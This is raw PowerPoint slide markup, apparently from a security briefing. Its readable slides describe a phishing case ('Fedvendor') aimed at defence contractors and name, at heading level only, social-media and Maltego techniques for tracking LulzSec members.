                                      <p:cBhvr>
                                        <p:cTn id="285" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2254"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="286" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="287" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2255"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="288" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2255"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="289" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="290" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2256"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="291" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2256"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="292" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="293" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2257"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="294" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2257"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="295" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="296" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2258"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="297" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2258"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="298" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="299" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2259"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="300" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2259"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="301" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="302" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2357"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="303" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2357"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="304" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="305" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2358"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="306" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2358"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="307" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="308" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2359"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="309" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2359"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="310" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="311" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2360"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="312" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2360"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="313" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="314" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2361"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="315" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2361"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="316" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="317" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2362"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="318" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2362"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="319" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="320" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2363"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="321" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2363"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="322" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="323" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2364"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="324" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2364"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="325" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="326" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2365"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="327" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2365"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="328" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="329" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2367"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="330" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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animBg="1"/>
      <p:bldP spid="2072" grpId="0"/>
      <p:bldP spid="2077" grpId="0"/>
      <p:bldP spid="2082" grpId="0"/>
      <p:bldP spid="2088" grpId="0"/>
      <p:bldP spid="2091" grpId="0"/>
      <p:bldP spid="2099" grpId="0"/>
      <p:bldP spid="2103" grpId="0"/>
      <p:bldP spid="2109" grpId="0"/>
      <p:bldP spid="2111" grpId="0"/>
      <p:bldP spid="2116" grpId="0"/>
      <p:bldP spid="2120" grpId="0"/>
      <p:bldP spid="2121" grpId="0"/>
      <p:bldP spid="2126" grpId="0"/>
      <p:bldP spid="2129" grpId="0"/>
      <p:bldP spid="2133" grpId="0"/>
      <p:bldP spid="2134" grpId="0"/>
      <p:bldP spid="2140" grpId="0"/>
      <p:bldP spid="2211" grpId="0"/>
      <p:bldP spid="2212" grpId="0"/>
      <p:bldP spid="2213" grpId="0"/>
      <p:bldP spid="2214" grpId="0"/>
      <p:bldP spid="2215" grpId="0"/>
      <p:bldP spid="2216" grpId="0"/>
      <p:bldP spid="2217" grpId="0"/>
      <p:bldP spid="2218" grpId="0"/>
      <p:bldP spid="2221" grpId="0"/>
      <p:bldP spid="2222" grpId="0"/>
      <p:bldP spid="2223" grpId="0"/>
      <p:bldP spid="2228" grpId="0"/>
      <p:bldP spid="2229" grpId="0"/>
      <p:bldP spid="2230" grpId="0"/>
      <p:bldP spid="2232" grpId="0"/>
      <p:bldP spid="2233" grpId="0"/>
      <p:bldP spid="2234" grpId="0"/>
      <p:bldP spid="2236" grpId="0"/>
      <p:bldP spid="2237" grpId="0"/>
      <p:bldP spid="2239" grpId="0"/>
      <p:bldP spid="2246" grpId="0"/>
      <p:bldP spid="2248" grpId="0"/>
      <p:bldP spid="2249" grpId="0"/>
      <p:bldP spid="2251" grpId="0"/>
      <p:bldP spid="2252" grpId="0"/>
      <p:bldP spid="2254" grpId="0"/>
      <p:bldP spid="2256" grpId="0"/>
      <p:bldP spid="2259" grpId="0"/>
      <p:bldP spid="2357" grpId="0"/>
      <p:bldP spid="2362" grpId="0"/>
      <p:bldP spid="2363" grpId="0"/>
      <p:bldP spid="2364" grpId="0"/>
      <p:bldP spid="2365" grpId="0"/>
      <p:bldP spid="2366" grpId="0"/>
      <p:bldP spid="2366" grpId="1"/>
      <p:bldP spid="2367" grpId="0"/>
      <p:bldP spid="2368" grpId="0"/>
      <p:bldP spid="2368" grpId="1"/>
      <p:bldP spid="2368" grpId="2"/>
    </p:bld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Online Fraud – Fedvendor </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Situation: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Employee receives email with link to “US” company to help on government RFP/RFI’s.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Problem:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“US” company with physical address in Fairfax actually is located in S. Korea</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“US” company domain owner is top Spammer in Asia-Pacific region </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“US” company physical address is home to multiple types of companies…(consulting to office painting) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“US” company will “evaluate” any RFP/RFI submitted to them. Gaining contacts, technology proposals, updated spam victims, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Discover a total of 23 other domains (several fake search engines) owned by same spammer all targeting IT contracting specifically DoD contracting </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Solution: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Result was a new joint FBI/USSS task force being formed to go after the Phishing group as they were targeting IT and Defense contractors and also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>comitting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> large scale banking fraud. </a:t>
            </a:r>
          </a:p>
          <a:p>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47</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244253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Fedvendor - Associations</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6"/>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B23B61D-7848-407F-A498-9F4C233B09A8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="259349" y="947058"/>
            <a:ext cx="8600209" cy="5324781"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Footer Placeholder 8"/>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2512209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Social Media How to leverage it 	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Examples of using Social Media uses </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tracking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>LulzSec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> members to posts </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tracking EXIF data to find location cyber to physical </a:t>
            </a:r>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49</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885408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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8231187" y="6377798"/>
            <a:ext cx="455613" cy="302402"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{2B23B61D-7848-407F-A498-9F4C233B09A8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="508000" y="1204913"/>
            <a:ext cx="3181048" cy="4714875"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A good sketch is better than a long speech</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Better known as</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> “A picture speaks a thousand words” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="allevents_2010-03-09_thumb.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3712860" y="1070106"/>
            <a:ext cx="5050140" cy="5039541"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7"/>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2257034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Cyber to Physical – Tracking Lulzsec members</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Goal: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Try and map the online Personas of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Lulzsec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> members to their physical locations. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tools: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Maltego</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Online postings associated  to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Lulzsec</a:t>
            </a:r>
            <a:r>
